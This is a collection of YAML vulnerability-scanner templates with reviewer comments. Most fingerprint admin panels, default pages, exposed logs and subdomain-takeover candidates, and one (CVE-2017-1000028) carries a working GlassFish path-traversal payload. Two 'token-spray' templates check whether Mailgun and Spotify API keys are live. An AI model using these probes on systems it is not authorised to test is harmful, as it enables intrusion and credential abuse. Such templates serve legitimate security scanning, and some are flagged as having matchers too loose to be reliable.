# occasionally auth tokens, so the remediation is to remove the file from the web root.
id: npm-log-file

info:
  name: Publicly accessible NPM Log file
  author: sheikhrishad
  severity: low
  tags: npm,logs,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/npm-debug.log"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "info it worked if it ends with ok"

      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /oracle-dbass-detect.yaml: --------------------------------------------------------------------------------
# Login-page fingerprint for Oracle DBaaS Monitor (body word + 200). The id/filename spelling
# "dbass" is kept as-is because other references may depend on it.
id: oracle-dbass-detect

info:
  name: Oracle DBaaS Monitor Detect
  author: pussycat0x
  severity: info
  tags: oracle,tech

requests:
  - method: GET
    path:
      - '{{BaseURL}}/dbaas_monitor/login'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'DBaaS Monitor'

      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /php/phpmyadmin-panel-10.yaml: --------------------------------------------------------------------------------
# One of a family of raw-request probes for phpMyAdmin under common install prefixes (here /web/).
# NOTE(review): the family is inconsistent on severity (info here, low for the /xampp/ and /admin/
# variants below) and none of them require a 200, so any page that prints "phpMyAdmin" — including a
# custom error page — will match; a status matcher would tighten this.
id: phpmyadmin-panel10

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel


requests:
  - raw:
      - |
        GET /web/phpmyadmin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "phpMyAdmin"
# -------------------------------------------------------------------------------- /php/phpmyadmin-panel-11.yaml: --------------------------------------------------------------------------------
# phpMyAdmin probe for the /xampp/ install prefix; same matcher as the other variants.
id: phpmyadmin-panel11

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: low
  tags: panel


requests:
  - raw:
      - |
        GET /xampp/phpmyadmin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "phpMyAdmin"
# -------------------------------------------------------------------------------- /php/phpmyadmin-panel-2.yaml: --------------------------------------------------------------------------------
# phpMyAdmin probe for the /admin/ install prefix; same matcher as the other variants.
id: phpmyadmin-panel2

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: low
  tags: panel


requests:
  - raw:
      - |
        GET /admin/phpmyadmin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "phpMyAdmin"
# -------------------------------------------------------------------------------- /php/phpmyadmin-panel-6.yaml:
# --------------------------------------------------------------------------------
# One of a family of raw-request probes for phpMyAdmin under common install prefixes (here /blog/).
# NOTE(review): severity differs across the family (low here and for /forum/, info for /php/ and
# /typo3/) with no stated reason, and no variant requires a 200, so any page that prints "phpMyAdmin"
# — including a custom error page — will match; a status matcher would tighten this.
id: phpmyadmin-panel6

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: low
  tags: panel


requests:
  - raw:
      - |
        GET /blog/phpmyadmin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "phpMyAdmin"
# -------------------------------------------------------------------------------- /php/phpmyadmin-panel-7.yaml: --------------------------------------------------------------------------------
# phpMyAdmin probe for the /forum/ install prefix; same matcher as the other variants.
id: phpmyadmin-panel7

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: low
  tags: panel


requests:
  - raw:
      - |
        GET /forum/phpmyadmin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "phpMyAdmin"
# -------------------------------------------------------------------------------- /php/phpmyadmin-panel-8.yaml: --------------------------------------------------------------------------------
# phpMyAdmin probe for the /php/ install prefix; same matcher as the other variants.
id: phpmyadmin-panel8

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel


requests:
  - raw:
      - |
        GET /php/phpmyadmin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "phpMyAdmin"
# -------------------------------------------------------------------------------- /php/phpmyadmin-panel-9.yaml: --------------------------------------------------------------------------------
# phpMyAdmin probe for the /typo3/ install prefix; same matcher as the other variants.
id: phpmyadmin-panel9

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel


requests:
  - raw:
      - |
        GET /typo3/phpmyadmin/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "phpMyAdmin"
# -------------------------------------------------------------------------------- /securenvoy-panel.yaml: --------------------------------------------------------------------------------
# Intended as a login-panel fingerprint for SecurEnvoy at /secadmin/.
# NOTE(review): the single word matcher is the empty string ''. An empty needle is contained in every
# body, so with matchers-condition: and this template effectively fires on any 200 from /secadmin/,
# whatever is served there. The fingerprint string was possibly lost when this dump was produced
# (e.g. an HTML tag stripped); restore a SecurEnvoy-specific body marker before relying on the template.
id: securenvoy-panel

info:
  name: SecurEnvoy Admin Login
  author: 0xrod
  severity: info
  tags: panel,securenvoy

requests:
  - method: GET
    path:
      - "{{BaseURL}}/secadmin/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - ''
        part: body

      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /symfony/symfony-profiler.yaml: --------------------------------------------------------------------------------
# Detects the Symfony web profiler left enabled on a deployed app; both body markers are required.
# The profiler exposes request/DB/config internals, so the fix is to disable it outside dev.
id: symfony-profiler

info:
  name: Symfony Profiler
  author: pdteam
  severity: high
  tags: config,exposure,symfony

requests:
  - method: GET
    path:
      - "{{BaseURL}}/_profiler/empty/search/results?limit=10"
    matchers:
      - type: word
        words:
          - "Symfony Profiler"
          - "symfony/profiler/"
        condition: and
        part: body

# -------------------------------------------------------------------------------- /vm/vmware-horizon.yaml: --------------------------------------------------------------------------------
# Fingerprints a VMware Horizon portal at the site root, following up to two redirects; requires 200 + body word.
id: vmware-horizon

info:
  name: VMware Horizon
  author: pdteam
  severity: info
  tags: vmware,horizon

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'VMware Horizon'

# -------------------------------------------------------------------------------- /workspace-one-uem.yaml: --------------------------------------------------------------------------------
# Login-page fingerprint for Workspace ONE UEM (AirWatch); body word only, no status matcher.
id: workspace-one-uem

info:
  name: Workspace ONE UEM AirWatch Login Page
  author: gevakun
  severity: info
  reference:
    - https://twitter.com/Jhaddix/status/1295861505963909120
  tags: panel,workspaceone,login

requests:
  - method: GET
    path:
      - "{{BaseURL}}/AirWatch/Login"
    matchers:
      - type: word
        words:
          - "About VMware AirWatch"
        part: body

# -------------------------------------------------------------------------------- /zipkin-exposure-1.yaml: --------------------------------------------------------------------------------
# Raw-request fingerprint for an exposed Zipkin Lens UI (webpack bundle marker in the root page body).
id: zipkin-exposure1

info:
  name: Zipkin Exposure
  author: pdteam
  severity: low
  tags: panel


requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        part: body
        words:
          - "webpackJsonpzipkin-lens"
# -------------------------------------------------------------------------------- /a-fingerprinting/mongodb-ops-manager.yaml: --------------------------------------------------------------------------------
# Login-page fingerprint for MongoDB Ops Manager (200 + product name in body), in rule/expression format.
id: mongodb-ops-manager

info:
  name: MongoDB Ops Manager
  author: dhiyaneshDK
  severity: info
  verified: true
  reference:
    - https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22

rules:
  r0:
    request:
      method: GET
      path: /account/login
    expression: response.status == 200 && response.body.bcontains(b'MongoDB Ops Manager')
expression: r0()
# -------------------------------------------------------------------------------- /adfs-detect.yaml:
# --------------------------------------------------------------------------------
# Detects AD FS with the IdP-initiated sign-on page reachable; the stylesheet path in the body is the
# marker. No status matcher is declared. An Internet-facing IdP-initiated sign-on page is commonly
# used for credential-spray attempts, so its exposure is worth reviewing even though severity is info.
id: adfs-detect

info:
  name: ADFS Detect
  author: Adam Crosser
  severity: info
  description: Detects ADFS with forms-based authentication enabled.
  tags: tech,adfs

requests:
  - method: GET
    path:
      - "{{BaseURL}}/adfs/ls/idpinitiatedsignon.aspx"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '/adfs/portal/css/style.css'

# -------------------------------------------------------------------------------- /contacam.yaml: --------------------------------------------------------------------------------
# Fingerprints a ContaCam video-surveillance web UI at the site root (body word + 200).
id: contacam

info:
  name: ContaCam
  author: dhiyaneshDk
  severity: low
  reference:
    - https://www.exploit-db.com/ghdb/6831
  tags: iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'ContaCam'
        part: body
      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /cve/2017/CVE-2017-1000028.yaml: --------------------------------------------------------------------------------
# GlassFish path traversal check using an overlong UTF-8 encoding of "..", following redirects; a 200
# carrying MANIFEST.MF headers confirms the file read. Defensively, servers should reject overlong
# encodings before path normalisation; the fix is the vendor patch for this CVE.
id: CVE-2017-1000028

info:
  name: GlassFish LFI
  author: sharecast
  severity: high

rules:
  r0:
    request:
      method: GET
      path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:")
expression: r0()

# -------------------------------------------------------------------------------- /default-fastcgi-page.yaml: --------------------------------------------------------------------------------
# Detects the TurnKey NGINX/PHP FastCGI default page at the site root (body word only).
id: default-fastcgi-page

info:
  name: Fastcgi Default Test Page
  author: dhiyaneshDk
  severity: info
  reference:
    - https://www.shodan.io/search?query=http.title%3A%22FastCGI%22
  tags: tech,fastcgi

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - "TurnKey NGINX PHP FastCGI Server"
        part: body

# -------------------------------------------------------------------------------- /default-openresty.yaml: --------------------------------------------------------------------------------
# Detects the OpenResty default welcome page at the site root (body word only).
id: default-openresty

info:
  name: OpenResty Default Page
  author: dhiyaneshDk
  severity: info
  reference:
    - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22
  tags: tech,openresty

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        words:
          - "Welcome to OpenResty!"
        part: body

# -------------------------------------------------------------------------------- /dotclear-detect.yaml: --------------------------------------------------------------------------------
# Fingerprints the Dotclear admin login at two candidate paths (body word + 200).
id: dotclear-detect

info:
  name: Dotclear Detect
  author: pikpikcu
  severity: info
  tags: tech,dotclear

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dc2/admin/auth.php"
      - "{{BaseURL}}/auth.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Dotclear"
      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /firebase-detect.yaml: --------------------------------------------------------------------------------
# Detects a Firebase Realtime Database host by requesting the rules endpoint with a placeholder auth
# value; the "Could not parse auth token" error identifies the service. It is a presence check only —
# it does not test whether the database itself is readable.
id: firebase-detect

info:
  name: firebase detect
  author: organiccrap
  severity: low
  reference:
    - http://ghostlulz.com/google-exposed-firebase-database/
  tags: tech,firebase

requests:
  - method: GET
    path:
      - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"

    matchers:
      - type: word
        words:
          - "Could not parse auth token"
        part: body

# -------------------------------------------------------------------------------- /froxlor-detect.yaml: --------------------------------------------------------------------------------
# Fingerprints the Froxlor server-management panel at the site root (body word + 200).
id: froxlor-detect

info:
  name: Froxlor Detect
  author: pikpikcu
  severity: info
  tags: tech,froxlor

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - "Froxlor Server Management Panel"

      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /jfrog.yaml: --------------------------------------------------------------------------------
# Login-page fingerprint for JFrog (Artifactory/Platform UI) at /ui/login/ (body word + 200).
id: jfrog-login

info:
  name: JFrog Login
  author: dhiyaneshDK
  severity: info
  reference:
    - https://www.exploit-db.com/ghdb/6797
  tags: panel,jfrog

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ui/login/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'JFrog'
      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /jira-unauthenticated-user-picker.yaml: --------------------------------------------------------------------------------
# Checks whether Jira's UserPickerBrowser page (a user-directory listing) is served without authentication.
# NOTE(review): no `condition: and` is set on the words and there is no status matcher; with the engine's
# default (or, as I understand it) a login redirect page containing the word "Username" would satisfy the
# matcher. Requiring all three column headers plus a 200 would make the finding reliable.
id: jira-unauthenticated-user-picker

info:
  name: Jira Unauthenticated User Picker
  author: TechbrunchFR
  severity: info
  tags: atlassian,jira

requests:
  - method: GET
    path:
      - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Email'
          - 'Full Name'
          - 'Username'
# -------------------------------------------------------------------------------- /mailgun.yaml: --------------------------------------------------------------------------------
# Token validation ("token-spray") template: sends a candidate Mailgun API key as HTTP Basic auth
# (user "api") to the vendor's domains endpoint; a 200 means the key is live. Note the request goes
# to api.mailgun.net rather than {{BaseURL}}, so the secret under test is transmitted to the vendor.
id: api-mailgun

info:
  name: Mailgun API Test
  author: zzeitlin
  reference: https://documentation.mailgun.com/en/latest/api-intro.html
  severity: info
  tags: token-spray,mailgun

requests:
  - method: GET
    path:
      - "https://api.mailgun.net/v3/domains"
    headers:
      Authorization: Basic {{base64('api:' + token)}}

    matchers:
      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /pingdom-takeover.yaml: --------------------------------------------------------------------------------
# Dangling-DNS check for Pingdom public status pages.
# NOTE(review): unlike frontify-takeover / vercel-takeover this one sets no `condition: and`, so a single
# phrase suffices, and there is no CNAME matcher; consider aligning it with the other takeover templates.
id: pingdom-takeover

info:
  name: pingdom takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - Public Report Not Activated
          - This public report page has not been activated by the user
# -------------------------------------------------------------------------------- /powerlogic-ion.yaml: --------------------------------------------------------------------------------
# Fingerprints an Internet-exposed PowerLogic ION power-meter web interface (body word + 200).
# Such OT devices generally should not be reachable from untrusted networks.
id: powerlogic-ion

info:
  name: PowerLogic ION Exposed
  author: dhiyaneshDK
  severity: low
  reference:
    - https://www.exploit-db.com/ghdb/6810
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'PowerLogic ION'
      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /puppetboard-panel.yaml: --------------------------------------------------------------------------------
# Fingerprints a Puppetboard dashboard at the site root, following up to two redirects (body word only).
id: puppetboard-panel

info:
  name: Puppetlabs Puppetboard
  author: c-sh0
  severity: info
  metadata:
    shodan-query: http.title:"Puppetboard"
  tags: panel,puppet,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - "Puppetboard"
# -------------------------------------------------------------------------------- /spotify.yaml: --------------------------------------------------------------------------------
# Token validation ("token-spray") template: presents a candidate Spotify bearer token to the
# vendor's /v1/me endpoint; a 200 means the token is live. The request goes to api.spotify.com,
# not {{BaseURL}}, so the secret under test is transmitted to the vendor.
id: api-spotify

info:
  name: Spotify API Test
  author: zzeitlin
  reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/
  severity: info
  tags: token-spray,spotify

requests:
  - method: GET
    path:
      - "https://api.spotify.com/v1/me"
    headers:
      Authorization: Bearer {{token}}

    matchers:
      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /synnefo-admin-panel.yaml: --------------------------------------------------------------------------------
# Fingerprints the Synnefo admin client at /synnefoclient/ (body word + 200).
id: synnefo-admin-panel

info:
  name: Synnefo Admin Panel Exposure
  author: impramodsargar
  severity: info
  tags: panel,synnefo

requests:
  - method: GET
    path:
      - "{{BaseURL}}/synnefoclient/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Synnefo Admin'

      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /vercel-takeover.yaml: --------------------------------------------------------------------------------
# Dangling-DNS check for Vercel: both the human-readable and the DEPLOYMENT_NOT_FOUND error markers
# must appear (condition: and). No CNAME matcher is declared, so confirm the DNS side before reporting.
id: vercel-takeover

info:
  name: vercel takeover detection
  author: pdcommunity
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - The deployment could not be found on Vercel.
          - DEPLOYMENT_NOT_FOUND
        condition: and
# --------------------------------------------------------------------------------